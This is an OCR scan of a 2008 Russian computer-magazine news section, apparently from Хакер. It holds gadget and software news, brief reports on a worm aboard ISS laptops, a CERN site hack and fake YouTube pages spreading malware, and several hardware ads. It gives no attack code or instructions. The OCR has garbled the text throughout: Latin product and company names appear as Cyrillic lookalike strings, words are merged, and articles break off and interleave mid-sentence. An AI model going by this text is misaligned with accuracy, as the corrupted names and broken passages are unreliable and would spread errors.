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ІПІГО 



Все воттолько и гундят: финансовый кризис, ахтунговый 
пипец, акции падают, банки банкротятся, амеры не платят 
по кредитам, банкиры стреляются в рабочем порядке по 
результатам дня. 

Ая смотрю вокруг, на своих коллег, друзей и близких и 
вижу, что нетакужвсе и плохо. При желании работать и 
зарабатывать особенных проблем этот кризис не должен 
доставить. Может, он и влияет на всякий там тупоголовый 
американский пролетариат, но мне до нихнетбольшого 
дела. Обанкротился банк-значит, был хреновый и де- 
рьмово работал. Оказался неспособным выжить в новых 
условиях. Это обыкновенный отбор, главная движущая 
эволюции. 



Я смотрю и думаю, что новая экономика, строительство 
которой сейчас начинается во всем мире это экономи- 
ка знаний, технологий и прогресса. Азначит — это наша с 
тобой экономика. 
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МАРИЯ «МІРВІІШ» НЕФЕДОВА 
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Обо всем за последний месяц 




почтового трафика снова вырос, теперь на 

160 %І 



№кіа раскрывает карты 



Популярная и любимая на российском рынке компа- 
ния ІЧокіа анонсировала два новых телефона. На них 
возложена ответственная задача — и дальше продолжать 
традиции культовой Ызегіез, развивая ее. 

Модель N85 — не что иное, какмощнейшийуниверсаль- 
ный коммуникатор-слайдер с 2.6 м 01_Е0-дисплеем, 
сочетающий в себе плеер с РМ-передатчиком, 
5-мегапиксельную камеру с оптикой отСагІ 
2еІ55, навигатор, интернет-браузер, а также 
поддержку высокоскоростных подключений 
и тігсоЗО-карт. Помимо этого, в комплекте с 
телефоном поставляется 3-месячная лицензия на 
использование навигационной системы с голосо- 
вым руководством. 

Не отстает и модель N79. Она может похвастаться 
теми же функциями, что и «старший собрат», включая, 
без шуток, отличную 5-мегапиксельную камеру и 2.4 м 
дисплей. Плюс ко всему, оба аппарата поддерживают 
игры для N- 6396 , на чем представители N окіа делают 
особый акцент. Уже к концу года нам обещают целый ряд 
локализованных игр всех мастей и не меньше 10 предус- 
тановленных на каждой изтрубок. Для обеих моделей 
доступны различные цветовые решения (N79 вообще 
поставляется стремя сменными цветовыми панелями 
Хргезз-Оп). В продаже телефоны появятся уже в конце 
осени. Точные цены назвать пока сложно, но в Европе N85 
будет стоить 450 евро, а N79 — 350 евро. 



Я.Аська 

Компания «Яндекс» объявила о запуске собственного сервиса для 
обмена мгновенными сообщениями — Я.Онлайн. В отличие оттого 
же Маіі.ги с их Маіі.ги Агентом, который существуетуже не один год, 
в Яндексе не создавали чего-то уникального. За основу был взят 
протокол ЗаЬ бег. Я. Онлайн, по сути — лишь вариант клиента. Из этого 
логично вытекает, что общаться можно не только с людьми, имеющими 
УапбехЮ.ноис юзерами других ]аЬЬег-сер веров, то есть 01 Р, ОМаіІ и 
Ыѵеіоигпаі. Возможности сконтачиться с пользователями упомянутого 
Маіі.ги Адепі и I СО, цитируя официальный сайт, «пока не предусмотре- 
но». На выбортакже предлагается версия с интегрированным Антиви- 
русом Касперского и бесплатным лицензионным ключом на полгода. 
После ознакомления с продуктом становится не совсем понятно, на что 
рассчитываетЯндекс в условияхжесткой конкуренции, которая сейчас 
царит на российском рынке и нота нс мессенджеров. Пока ничего даже 
мало-мальски нового Я.Онлайн не демонстрирует. 
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Коек 80ІІСІ - Неагі ТоисЫпд 



Быстрее, 

чем по проводам! 




АЗІІ8 ѴѴІ.-160М 

Компактный У5В 2.0 адаптер 802.1 1 N 



А81І8 ѴѴІ_-500ѴѴ 

ПЕРВЫЙ УНИВЕРСАЛЬНЫЙ БЕСПРОВОДНОЙ МАРШРУТИЗАТОР 802.1 1Ы 



Азиз ѵѵызом 

Высокопроизводительный 
адаптер РСІ 802.1 1 N 



• Сертифицирован по программе Соппесі ѵѵШі ІпІеІ® Сепігіпо®: максимум производительности при использовании 
с ноутбуками на платформе Іпіеі® нового поколения. 

• 5-ти кратное увеличение скорости передачи данных и 2-х кратное увеличение зоны охвата сети. 

• Поддержка протокола 802.1 1 п ОгаЙ2.0 (300 Мбит/с), полная обратная совместимость с 802.1 1 Ь/д. 

• А51ІЗ Е23е1ир- легкая настройка защищенного беспроводного соединения. 

• 2 порта ІІЗВ 2.0 для подключения принтера, жесткого диска и веб-камеры. 

• АЗІІЗ Ооѵѵпіоаб Мазіег- качайте файлы из сети Іпіегпеі, даже когда Ваш компьютер выключен. 



Всемирная гарантия 2 года ѴѴѴѴѴѴ.аЗиЗ.Ш Горячая линия АЗИЗ: (495) 23-11-999 

Партнеры: Москва (495): БЮРОКРАТ (495) 745-55-11; Коосіоо ТесИпоІодіез (495) 256-17-31; ОЮІ (495) 22-11-111; ПИРИТ-Дистрибуция (495) 974-3210; ТВІМІТѴ-ЕІ.ЕСТК0МІС5 ѵѵш/.ігі-еі.ш; Меіго СазГі&Саггу ш/ѵѵ. теіго-сс.ги; Мвидео 
ѵѵѵѵѵѵ.тѵісіео.ги; Месііа Магкі ѵѵѵѵѵѵ.тесііатагкі.ги; Техносила ѵмѵѵ.іесііпозііа.ги; Эльдорадо ѵмѵѵ.еісіогасіо.ги; Белый Ветер - ЦИФРОВОЙ 730-30-30; ІОИ 5-444-333; Неоторг 223-23-23; НИКС 974-33-33; Санрайз 542-80-70; СтартМастер 785-85-55; 
Формоза 234-21-64; Форум Компьютере 775-77-59; Ф-Центр 105-64-47; ТепГоІсІ Огоир 580-6385; ТРК 64247-29; Электрон-Сервис 737-44-99; НТ Компьютер 363-93-93; ИЗЫ Сотриіегз 775-82-02; АРКИС (499) 612-96-90; Х-СОМ 7-999-600; 
Компьютер Маркет 500-03-04. 

С-Петербург (812): КЕЙ 074; Компьютерный Мир 333-00-33; АУРА Компьютеры 325-69-20; КИЗ 31 6-1 3-60; ТК-плюс 333-1 5-45; РИК- Компьютере 327-34-10. 

Архангельск: Норланд (8182) 26-90-10; Белгород: Элси (4722) 55-86-11; Воронеж: РЕТ (4732) 77-93-39; Владивосток: ОИЗ (4232) 300454; Екатеринбург: Трилайн (343) 378-70-70, Белый Ветер Екатеринбург (343) 291-10-00, НТ Компьютер (343) 
379-31-68; Жуковский: Байт (248) 741-38; Иркутск: Комтек-Компьютерз (3952) 258-338; Краснодар: Владос (861) 210-10-01; Красноярск: Старком (3912) 49-11-11; Махачкала: Фирма АС (8722) 68-06-05; Мурманск: Мега Импекс (8152) 
477477; Нижний Новгород: ЮСТ (831) 225-28-23; Новокузнецк: Титан (3843) 70-38-38; Новосибирск: ЗЕТ НСК (383) 34648-42, Техносити (383) 212-53-33, НТ Компьютер (383) 344-99-04; Омск: Компьюмаркет РИТМ (3812) 23-05-05; Петрозаводск: 
Компания «Р1» (8142) 781-323; Пермь: НТ Компьютер (342) 237-15-73; Псков: Все для ПК (8112) 72-72-75; Ростов-на-Дону: Иманго (863) 232-47-18, НТ Компьютер (863) 295-30-20; Солнечногорск: Компьютерный мир (469-26) 4-87-69; Сургут: 
Компьютерный супермаркет «Первый»; Томск: ИНТАНТ (3822) 56-00-56; Тюмень: Техносити (3452) 26-19-72; Уфа: Форте ВД (347) 260-00-00, Кламас(347) 291-21-12; Ярославль: Сеть компьютерных салонов «Фронтекс» (4852) 58-58-58. 
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Аудио креатив 

Хорошая звуковая система — это прекрасно. А когда она сочетает в себе 
все последние достижения прогресса, потребляет в режиме «зІапсІ-Ьу» 
ничтожное количество энергии и соответствует даже суровым стандар- 
там «зеленых», — это прекрасно вдвойне. Позволь представить новую 
разработку СгеаРѵе, расширяющую линию СідаѴѴогкз — акустику ТЗ. В 
компании уверены, что в этой 2.1 системе им удалось поднятьзвуча- 
ние на новый уровень. Два компактных динамика дают прекрасное 
качество даже на очень высоких частотах и полностью охватывают 
спектр средних. Сабвуфер, в котором реализована технология Сгеабѵе 
5БАМ (акустический модуль с симметричной нагрузкой], обладаеттремя 
165-миллиметровыми динамиками и гарантирует глубокие, сочные 
басы. Система укомплектована проводным ДУ, по совместительству 
исполняющим роль выключателя питания и несущим в себе дополни- 
тельные выходы для наушников и мультимедийных плееров. Крометого, 
в режиме ожидания ТЗ потребляет ничтожное количество энергии. За 
это надо сказать «спасибо» новейшей технологии І_о\л/5і:апсІЬу Роѵѵег, 
которая сейчас проходит патентование. Искать новинку в магазинах 
можноуже с конца октября, а ее цена ориентировочно составит6999 руб 
Одновремено в продажу поступят бюджетные модели — СідаѴѴогкз Т40 
Зегіез II и ОідаѴѴогкг Т20 Зегіез II, представляющие собой улучшенные 
аудиосистемы Т40 и Т20 2.0. 



Бокал 

мартини от ІЛт 

Последнее время ноутбуки становятся нетолько предметом 
первой необходимости, но и модными, стильными аксессуара- 
ми. Разработчики теперь внимательно следятза тенденциями 
ведущих домов мод и создаютсвои детища нетолько функ- 
циональными, но и эстетически привлекательными. Яркий 
тому пример — новинка от БС: два ноутбука серии Р (Р410 и 
Р510). Дизайн этих машинок призван навевать мысли о бокале 
Мартини с вишенкой. Жемчужная внутренняя отделка, скруг- 
ленныеуглы и две экзотичных цветовых вариации — «Зипгізе» 
(черно-красный восход солнца] и «Моопгізе» (черно-сереб- 
ристый восходлуны] — создают настоящее пиршество для глаз. 
Технически модели в основном различаются лишь размером 
матрицы — 14, Г и 15,4", итем, чтоу Р510 клавиатура полноцен- 
ная, с цифровым блоком. Базируются новинки на платформе 
Мопіеѵіпа, что дает отличную производительность и уменьшает 
энергопотребление. Под красивой крышкой можно найти про- 
цессор I п 1 ;еІ Соге 2 на чипсете МоЬіІе I п 1 ;еІ 45 Ехргезз, ОЗУ ООН2 
8 ООМН 2 объемом до 4ГБ, жесткий дискЗАТА 5400грт до 320ГБ, 
ОѴО-привод, встроенный видеопроцессор МоЬіІе I пГеІ ѲМА 
4500МНБ и многое другое. Внешняя видеокарта вариативна; 
это можетбыть как ІЧѴЮІАОеРогсе 9300М 05 (00192 256МВ 
ѴПАМ),таки ІМѴЮІАСеРогсе 9600М 05 (ООП2512МВѴПАМ) —у 
старших моделей. Отдельно заметим, что для Р5 1 0 возможны и 
другие конфигурации — обещают, что будет из чего выбрать. 



Средний юзер просматривает 2256,9 страниц и проводит в Сети более 32 часов в 
месяц. 





За сутки в западной блогосфере появляется 
порядка 900.000 новых постов. В 
кириллическом секторе — 200.000 
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Товар сертифицирован, на правах рекламы 



Цифровой дом 






АЗІІЗ рекомендует ѴѴіпсІоѵѵз Ѵізіа® Ноте Ргетіит 




В °КРАСКИ 

МИРА... 



ѵ 

Совершенный источник звука 

Окажитесь в центре событий с технологией 
АЗІІЗ АІ ЗштоипсІ ТесИпоІоду 



Оцените непревзойденное качество звука 
и управляйте им сами 

Новый мультимедийный ноутбук А51І5 М50Ѵ, созданный на базе 
процессорной технологии ІпіеІ® Сеп1гіпо®2, с предустановленной подлинной ОС 
ѴѴіпсІоѵѵз Ѵізіа® Ноте Ргетіит и оснащенный производительным графическим 
адаптером, с большим объемом видеопамяти, производит впечатление уже одним 
своим внешним видом и потрясающим качеством исполнения. Этот ноутбук 
с технологией АІ ЗиггоипсІ и диагональю 15” способен удовлетворить самые 
взыскательные требования к качеству звука. Пройдя предварительную обработку 
с помощью технологий ЕирИапу и йоІЬу Ноте Тітеаіег, звуковой сигнал улучшенного 
качества с настоящим эффектом “зиггоипсГ воспроизводится через встроенные динамики 
АКес Ьапсіпд. Уникальный мультимедийный тачпэд обеспечивает простое и удобное 
управление приложениями в любом из двух режимов. 



Всемирная гарантия 2 года 



Горячая линия А5У5: (495) 23-11-999 



А5и34УОІІ (495) 585-8045; Белый Ветер - ЦИФРОВОМ (495) 730-30-30; СтартМастер (495) 785-85-55, 8 (800) 555-8-555; Неоторг (495) 223-23-23; РОІ.АКІЗ (495) 755-55-57 
Москва: Аваком-М (495) 730-74-54, ЮМ (495) 5-444-333, Респект (495) 177-40-77, Санрайз (495) 788-80-88, ТРК (495) 739-08-28, ТепГоІсІ Огоир (495) 580-6385, иЗЫ 
(495) 775-82-02, Ф-Центр (495) 925-6447, ИЕХИЗ (495) 628-23-67, ОШІ (495) 221-1111, ПИРИТ (495) 785-55-54, Мерлион (495) 981-84-84, ЕІко (495) 234-28-45, Пронет 
(495) 789-3846, Юпитер (499) 271 -8350, ОС5 (495) 995-25-75, (812) 324-28-70; 

Санкт-Петербург: АІрМа (812) 320-80-70, ИВСот (812) 329-70-00, Кей (812) 074, Компьютерный мир (812) 333-00-33, СТР Компьютере (812) 542-45-51; Владивосток: ДНС 
(4232) 300-454; Воронеж: РЕТ (4732) 77-93-39; Екатеринбург: Буква (343) 2222-025; Иркутск: ѴѴігагсІ (3952) 258-001; Казань: НоутбукофФ (843) 264-26-01; Краснодар: Владос 
(861) 210-10-01, Санрайз (861) 210-00-66; Красноярск: Аверс (3912) 560-561, Борлас СБ (3912) 58-09-52, Старком (3912) 49-11-11; Новосибирск: НЭТА (383) 216-33-11, Техносити 
(383) 212-53-33, Левел (383) 212-00-05, Готти (383) 362-00-44; Омск: Ритм (3812) 23-64-00; Пермь: Инстар Ноутбукофф (342) 270-01-11 ; Ростов-на-Дону: Санрайз (863) 240-11-77, Иманго 
(863) 232-47-18; Самара: Прагма (846) 270-17-01, Санрайз (846) 241-67-53, Саттелит (846) 224-00-00; Саратов: Атто (8452) 444-111; Томск: Интант (3822) 56-00-56; Тюмень: Арсенал+ 
(3452) 797-070; Уфа: Кламас (347) 291-21-12, Форте ВД (347) 260-00-00 



СепігіпоЗ 



Іпіеі, логотип ІпіеІ, Сепігіпо и СепТгіпо 
Іпзісіе являются товарными знаками 
корпорации Іпіеі в США и других 
странах. 



^ гтпедапеѵг 



Яндекс занимает 



46 % 



российского поискового рынка. 



Общее рабочее 
пространство 

С сентября текущего года М ісгозоН официально запустил в России 
бета-тест веб-сервиса ОНісе І_іѵе ѴѴогкзрасе ( ѵѵѵѵѵѵ.оІТсе.Ііѵе.сопп ). 
развивающего их концепцию Зоііѵѵаге+Зегѵісез. ОІЕсе І_іѵе ѴѴогкзрасе 
— штука совершенно бесплатная и доступна любому желающему. Она 
позволяетхранить документы (а также рисунки, РОР-файлы и прочее] 
в онлайне и, расшаривая доступ посвященным лицам, совместно над 
ними работать. Начинание, бесспорно, благое, но давай посмотрим, 
что нам предлагают, поближе. Во-первых, поддерживаются только 
два браузера: это ІЕверсиибивышеи ЕТеРох, начиная от версии 2.0. 
Во-вторых, места под каждого юзера выделено 500 Мб. Возможности 
расширения не предусмотрено даже за деньги, а расшарить доступ 
можно максимум для 100 человек. В-третьих, редактировать документы 
непосредственно в онлайне нельзя. Чтобы отредактировать файл, нуж- 
но сохранить его к себе, открыть в ѴѴогсГе (кстати, поддерживаются вер- 
сии ХР, 2003, 2007], сделать «черное дело» — и залить обратно. Не очень 
удобно, верно? Без Офиса в рабочей области можнотолько оставлять 
заметки да комментарии — и просто смотреть на плод руксвоих (или 




товарища). В-четвертых, специально для параноиков — протокол ЫТрз 
используется при регистрации на сайте, а впоследствии работать при- 
дется с обычным Шр. В МісгозоіЕ уверяют, что это не опаснее отправки 
документа по электронной почте, но верится отчего-то с трудом. Вывод? 
На выходе мы получаем весьма однобокую реализацию хорошей идеи. 

И даже списать все это на бету не выходит. 



Количество поисковых порно-запросов 

упало с 20% до 10% (время юзеры 
предпочитают проводить в социальных 
сетях) . 



Урожай Ябблок 



Детектор правды 

Наши друзья с радио ЕЫЕРСѴ 104.2 ЕМ запустили новоеутреннее шоу 
«Детектор правды», выходящее в эфир в будни с 9 до 10 утра. 

Если ты не боишься полиграфа и готов говорить о себе правду и только 
правду, отвечая на любые вопросы —то можешь позвонить на Радио 
ЕЫЕРСѴ 104.2 ЕМ, пройти кастинги даже попытаться выиграть разыгры- 
ваемый в шоу миллион рублей. 

Вопросы будут за давать звезды Радио ЕЫЕРОУ 104.2 ЕМ Морозова, Аби - 
таева и Саймон. Победителя объявят26 декабря в прямом эфире Радио 
ЕЫЕРСУ 104.2 ЕМ. 

Подробности и правила участия ищи на ѵѵѵѵѵѵ.епегдѵіпп.ги . 




Компания Арріе представила широкой публике обновленные 
іРосГы всех мастей, но событие вышло скорее ожидаемым, чем 
долгожданным. Завеса тайны была приоткрыта давно, и заглянуть 
за нее успели все желающие. В Сети уже продолжительное время 
назад всплыли фотографии новых іРоб папо 40 , и на презентации, 
по сути, все это просто официально подтвердили. 

Больше всего изменилась линейка Ыапо. Новые размеры плееров 
(90,7 х 38,7 х 6,2 мм] достигнуты за счеттонкого корпуса из анодиро- 
ванного алюминия, плавно выгнутого в сечении. Кстати, теперь 
корпус полностью выполнен из экологически-чистых материалов, 
и «Гринпис», несомненно, в восторге. Вариантов расцветки прос- 
то рекордное количество: 9 разных, сочных цветов. Но внешними 
улучшениями не ограничились. Кое-что добавили и в «начинку». 

Так, Ыапо теперь могут похвастаться диктофоном и акселеро- 
метром. Скажем, для 
активации функции 
случайного воспроиз- 
ведения плеер нужно 
просто потрясти. Это, 
конечно, сразу расши- 
ряет игровые возмож- 
ности серии, — в іТипез 
Зіоге уже появилась 
категория «игры для 
іРоб папо с акселеро- 
метром». 



Изменения постигли нетолько Ыапо. Серия ЗиіТІе полностью 
сменила «окраску», а іРоб Ео и с Ь , наконец, перестает быть просто 
купированным іРЬопе.Тоисб 2 О , во-первых, имеет корпус из 
нержавеющей стали, что хорошо уже самопосебе.а, во-вто- 
рых, оснащен кнопками регулировки громкости и встроенным 
динамиком. За счет прошивки версии 2.1 устранен ряд глюков, и 
возросла скорость работы и загрузки приложений. 

Ну и еще одна новость, пожалуй, наиболее актуальная для наших ши- 
рот. Не прошло и года, как в Арріе наконец-то 
поишли к консенсѵсѵс нашими сотовыми 

"“Г 7 ™— 

операторами и, о чудо, в РФ 
началась официальная продажа 
іРЬопе. У трех крупнейших 
операторов (МТС, Вееііпе и «Ме- 
гаФон», если кто-то не догадал- 
ся] уже можно оформить заявку 
на приобретение, правда, 
подробности пока остаются тай- 
ной, покрытой мраком, а слухи 
крайне противоречивы. 
Судя по всему, 
телефоны тради- 
ционно для Арріе 
будут залочены 
под конкретного 
оператора. 



► 008 



ХАКЕР 10/118/08 




Т08НІВА 

ЬеасНгкд Іппоѵаі оп » 




Х300 - МАСТЕР ИГРЫ 



> Новый ноутбук Оозтіо Х300 
с процессорной технологией 
Іпіеі® Сепігіпо® 2 всем своим 
агрессивным видом дает 
понять, что он заряжен 
на беспрецедентную 
по реалистичности игру. 



> Что дальше? 

ѵѵѵѵѵѵ.дозтіо.ги 

Информационный центр: 
8 - 800 - 100 - 05-05 (города РФ] 
8 - 495 - 983 - 05-05 (Москва) 

ѵѵѵѵѵѵ.ІозЫЬа.сот.ги 



ІпѣеІ, логотип Іггіеі, Сепітіпо, Сепітіпо Іпзісіѳ, ІпіѳІ Согѳ и Соге Іпзісіѳ являются товарными 
знаками корпорации ІпіеІ в США и других странах. На правах рекламы 
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Черви на орбите! 

Малварьуже не впервые попадает«в космос» (а точнее, на орбиту]. Случай, о котором пойдет 
речь, не беспрецедентный, но все равно вопиющий. В личное пользование космонавтов еще 
в июле 2008 года на Международную космическую станцию доставили ноутбуки. С них они, к 
примеру, отправляли на Землю мэйлы. А теперь внезапно выяснилось, что все компьютеры были 
заражены червем Оаттіта.АО, и этого почему-то никто не заметил. Сам по себе вирус вряд ли 
представлял для МСК какую-то опасность, ведь он ориентирован на кражу паролей к популярным 
на востоке ММО-играм, таким как Маріе Зіогу, НиапдУі Опііпе, Таіезѵѵеаѵег и т.д. В худшем случае 
космонавты лишились бы аккаунтов, имей они таковые. В ЫАЗАэтотфакт подтвердили, заявив, 
что, в целом, никакой угрозы для оборудования и систем управления не было. Также сослались 
нато, что вредоносное ПО в космос попадает редко итолкуон него там мало. Ачтобы история не 
повторилась (кто знает, вдруг в следующий раз это окажется не безобидный червяк?], в ЫА5А 
намереваются создать специальные системы безопасности. Что ж, давно пора! 
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Все тайное становится явным 



Еслиты, дорогой читатель, соберешься ехать в Индию, тозапомни — ни 
в коем случае не совершайтам ничего противозаконного (впрочем, пре- 
ступлений лучше вообще нигде не совершать]. Потому что в противном 
случае утебя есть шанс познакомиться с местной системой правосудия, 
а Индия отныне является первой страной в мере, где приговортебе могут 
вынести, основываясь на результатах сканирования головного мозга. 
Технологию Вгаіп ЕІесІгісаІОзсіІІайопзБідпаІиге (ВЕ05], которую в 
стране с радостью взяли на вооружение, создал индийский нейробиолог 
Чампади Раман Мукундан, опираясь на разработки своихамериканс- 
ких коллег. На голову испытуемого крепятся электроды, измеряющие 
электрические волны мозга. Человексидитсзакрытыми глазами, вто 
время какемузадают различные вопросы, фиксируя реакцию. Впос- 
ледствии результаты энцефалограммы обрабатываются при помощи 
специального ПО (да, Чампади изобрел неэнцефалограмму], и, согласно 
задумке Мукундана, на них отчетливо видно, реагировали определенные 
участки мозга на чтение подробностей какого-то преступления, или же 
нет. Ученый уверяет, что можно отличить одни воспоминания от других. 
Скажем, память случайного свидетеля преступления будет отличаться от 
воспоминаний человека, это преступление совершившего. Основываясь 
на показаниях ВЕ05,уже был вынесен один обвинительный приговор, и, 
несмотря на откровенный скепсис со стороны многихученых, наработкой 
оченьзаинтересовались в других странах. 




Хакерский софт от А$и8 




Крайне неприятный инцидент произошел 
с гигантом «железного» рынка компани- 
ей Азиз. Отошибок не застрахован никто, 
но чтобы допустить такой прокол, нужно 
было постараться. На ОУИ-дисках, которые 
поставлялись вместе с продукцией Азиз, 
внимательные юзеры со всего мира обнару- 
жили кое-что странное (у некоторых, правда, 
сработала не наблюдательность, а антивирус, 
оповестивший о крэке для ѴѴіпРаг’а]. На дис- 
ке нашлась папка с характерным названием 



«С гаек», содержащая различные се рийники, папка с документами от 
МісгозоіЧ с приватной информацией для разработчиков и даже внут- 
рикорпоративные документы Азиз, и исходные коды их ПО. Обнаружи- 
ласьтам и РоѵѵегРоіпі-презентация, в красках повествующая о самых 
острых проблемах компании, вызывающих у боссов наибольшее 
беспокойство. Когда «курьез» всплыл на свет сразу в нескольких жур- 
налах и в Сети, Азиз тактично принесли извинения и пообещали, что 
такого больше не повторится. Детально комментировать случившееся 
представители компании наотрез отказались. А ведь потом эти самые 
люди кричат об утечках информации, всемогущих хакерах и корпора- 
тивном шпионаже. Какстрашножить. 
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Реклама 




ПАРЕНЬ С ОГОНЬКОМ ДОМИНО 




ШЕРИФ 




5-Й РАЗМЕР 



А ВАМ ПОДХОДИТ 
ОЮ 5РІСЕ ГЕЛЬ + ШАМПУНЬ? 

КОНЕЧНО! КАК БЫ И ГДЕ БЫ НИ РОСЛИ У ВАС ВОЛОСЫ, ОЮ 5РІСЕ ГЕЛЬ + ШАМПУНЬ, НЕСОМНЕННО, ВАМ ПОДХОДИТ! 




КОРОЛЬ ДИСКО 




МИНИ-БИКИНИ 



КОЛЮЧКА 




СТРАЖНИК 




ПАУКИ-БЛИЗНЕЦЫ 




НЕАНДЕРТАЛЕЦ 




ОСТРОВИТЯНИН 




0І_0 БРІСЕ ГЕЛЬ + ШАМПУНЬ. 
ДЛЯ ТЕЛА. ИЛИ ДЛЯ ВОЛОС. 
ИЛИ ДЛЯ ТОГО И ДРУГОГО. 
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БАК аіаск 



Оказывается, было бы желание, а хакнуть можно даже коллайдер. Да-да, тот самый, который 
адронный, большой, находится под землей между Швейцарией и Францией и предвещает нам 
всем смерть в «дружеских объятиях» хэдкрабов. Систему СЕВЫ (Европейского центра ядерных 
исследований) взломала группа греческих хакеров 05Т : СгеекЭесіігіІуТеат. И ломанули они не 
только сайт, на котором некоторое время провисел кислотно-зеленый греческий текст, а именно 
саму систему безопасности, не на шутку напугав ученых. Еще бы чуть-чуть и ребята добрались бы 
до СМ5М0Ы — системы, контролирующей работу компактного мюонного соленоида, который был 
создан для отслеживания и обработки данных, получаемых при работе ВАКа. Немного подумав, 
ученые, правда, пришли к выводу, что хакеры, должно быть, просто хотели указать на уязвимость, 
потому как имей они цель влезть вСМ5М0І\І,онибы туда влезли. Очевидно, что защита СЕВІЧ’а 
требует существенной доработки и не выдерживает пристального «внимания общественности». 
Хотя доработка секьюрити-систем отобщения схэдкрабами нас все равно, конечно, не избавит :]. 



Ежедневно в сети циркулирует порядка 150 млрд . спам- 
сообщений. 

Новая эра в игровой и порно-индустрии 

Эти японские ученые такие затейники! В то время каких западные 
коллеги озабочены поисками лекарства от рака и разработкой 
оружия массового поражения, они продолжают создавать восхи- 
тительно безумные вещи. Так, например, на востоке ближе всех 
подошли к созданию системы для передачи запахов (что было бы 
весьма актуально в играх и кино), а теперь вот замахнулись и на пе- 
редачу ощущений. Притом, успешно. Команда Университета Токио 
во главе с Та каюки Ивамоко (Такауикі Іѵѵатоіо] представила свою 
разработку — силовое поле, генерируемое в воздухе посредством 
ультразвуковых волн и позволяющее весьма натурально осязать 
виртуальные предметы. Текущий прототип комплектуется камерой, 
которая отслеживает передвижения руки пользователя и формирует 
у него под пальцами нужный объект. Пока система может создавать 
только небольшое «напряжение» в вертикальном направлении, но, 
по заверениям разработчиков, проблема решаема. Сейчас ученые 

Ооо^іе. Теперь хромированный 

Браузерные войны продолжаются, и на сцене появляется новый игрок. 

Корпорация Соодіе запустила в народ бета-версию своего собственного 
браузера Соодіе СЬготе. Во многом опираясь на идеи Арріе, сделанный 
с использованием компонентов АррІеѴѴеЬКіІ и Могіііа ЕігеІох.Хром (в 
рунете тутже прозванный «Хромой») только за первые сутки существова- 
ния успел отвоевать почти 1 % рынка, что практически беспрецедентно. 

В целом, браузер действительно удобен, прости очень быстр — именно 
на эти моменты делался упор при создании. В частности, была ускоре- 
на работа с ЭаѵаЗсгірІ:, и это заметно даже на глаз. Плюс, Хром делает 
серьезную заявку на стабильность и безопасность. Каждая вкладка здесь 
представляет собой полностью отдельный процесс, и если из-за кривого 
приложения подвисаетодин сайт, то цепной реакции не происходит. Весь 
браузер отнюдь не заваливается, и «дохлую» страничку можно спокойно 
закрыть. Имеется и режим инкогнито, при активации которого браузер 
никакие прото колирует действ и я юзера, — и множество других полезнос- 
тей. Однако бета всегда остается бетой. Уязвимость в СЬготеуже нашли 
не одну, но Ооодіе пока довольно оперативно латает прорехи, выпуская 
обновления. Другое дело, что работаетХром пока только под Виндами, 
не умеет адекватно синхронизироваться другими браузерами и имеет 
множество мелких недоработок. К примеру, нельзя просматривать сайты 



без картинокили скролить, нажав на колесо мыши. Чтобы понять «пан 
или пропал», нужно ждать финального релиза и судить уже по нему, а пока 
— тестируем. 



— 



. 







сосредоточились на другом: они «обучают» передатчик достоверно 
воспроизводить различные текстуры. Стоит ли говорить, что среди 
игроделов технология уже вызвала самый пристальный интерес. 
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Только за 1 полугодие 2008 в Казрегзку ЬаЬ. обнаружили 367.772 НОВЫХ 
вредоносных программ. 



Фальшивый УоиТиЬе 

На какие только ухищрения не идут сетевые мошенники, чтобы 
заразить компьютер доверчивого пользователя. Сейчас в моде новая 
фишка — фальшивые ѴоиТиЬе-страницы. Криминальные умы просто 
не могли оставить популярный сервис без внимания, а раз уж распро- 
странять малварь непосредственно через сам УоиТиЬе не получается, 
всегда можно создать подделку. Широко известная в узких кругах про- 
га УТРакеСгаІюг позволяет легко сгенерировать фейковую страничку 
с роликом, где впоследствии юзеру предлагается поставить некий ко- 
дек, необходимый для просмотра, или обновить РІазЬ. Понятное дело, 
под видом апдейта скрываются трояны, вирусы и прочие пакости. 
Притом, сама прога на редкость удобна и проста в обращении — можно 
даже выбирать параметры ролика и настраивать тип сообщения, 
демонстрирующегося юзеру. Конечно, завсегдатай Сети, скорее всего, 
сообразит, что здесь что-то нетак, но неискушенных пользователей 
все равно гораздо больше. Они от предложения «обновить РІазЬ» не 
откажутся. 




Социальная сеть для спецагентов 




Бедные работники американских спецслужб, ока- 
зывается, испытывают недостатокобщения и очень 
от этого страдают. В частности, они давно завидуют 
пользователям социальных сетей, вроде того же 
РасеЬоок или МуЗрасе. И чтобы бедолагам не было 
такобидно, в конце сентября в Америке начала работу 
закрытая социальная сеть А-5расе, предназначенная 
исключительно для сотрудников ФБР, АНБ, ЦРУ и 
других разведслужб США. Это, к сожалению, не шутка! 
Целью проекта является не только свободное общение 



означенных индивидов, но и укрепление безопаснос- 
ти США, через сосредоточение всех данных разведки 
в одном месте. Интересно, кто сказал им, что та кой 
подход укрепит безопасность? Вспоминается старая 
поговорка, гласящая, что все яйца не кладут в одну 
корзину. Впрочем, сами организаторы затеи спокойны 
и считают, что проблем не возникнет. В своих системах 
безопасности они более чем уверены. Впору делать 
ставки, когда их хакнут в первый раз, и в каких объемах 
секретные данные попадутв широкий доступ. 
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НОВЫЕ РЕШЕНИЯ 
РАН О А 5ЕСІІВІТѴ 2009 

МАКСИМАЛЬНАЯ ЫЩНТА 
ОТ КИЬЕР.ѴПгеЭС МИНИМАЛ ЬНЫМ 
10Щ0СТВДЕМ. М К0МЛШИР 
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Теле-привет из Китая 

Компания СотргоТесбпоІоду, специализирующая на компьютерной мультимедиа, 
выпускает новый, автономный ТВ-тюнер ѴісІеоМаІе Ѵ200, способный стать отлич- 
ным дополнением клюбому монитору или проектору. Ему не нужны ни драйвера, ни 
дополнительный софт (по сути, ему не нужен и компьютер], так что — никаких проблем 
с установкой и настройкой. ѴібеоМаіе Ѵ200 поддерживает разрешения вплоть до 
1680x1050 и 1600x1200 и свободно работает каксобычными.таки с широкоформатными 
мониторами, диагональю от 1 5 дюймов и практически до бесконечности. Хочешь, смот- 
ри телевизор — режим «картинка в картинке» и предпросмотр 9 каналов одновременно 
обеспечены. Если же желаешь кино без рекламы, ктвоим услугам поддержка ОѴО- 
плееров и видеомагнитофонов, а также режим 5таг1:2оопп, растягивающий картинку 
БеііегВох на весьэкран. Ну, а если хочется играть — играй, ведь кѴібеоМаіе Ѵ200 можно 
подключитьлюбую современную консоль. Без радиотоже не останешься — модель 
ѴібеоМаІе Ѵ200Е может похвастаться ЕМ-приемником и встроенным динамиком. Сло- 
вом, еслиты подыскиваешь изящное решение для создания мультимедийного центра, 
то это, вероятно, оно и есть. 



Еп( 1 ш 8 Іа 8 ( Іпіегпеі АѵѵагсІ 2008 



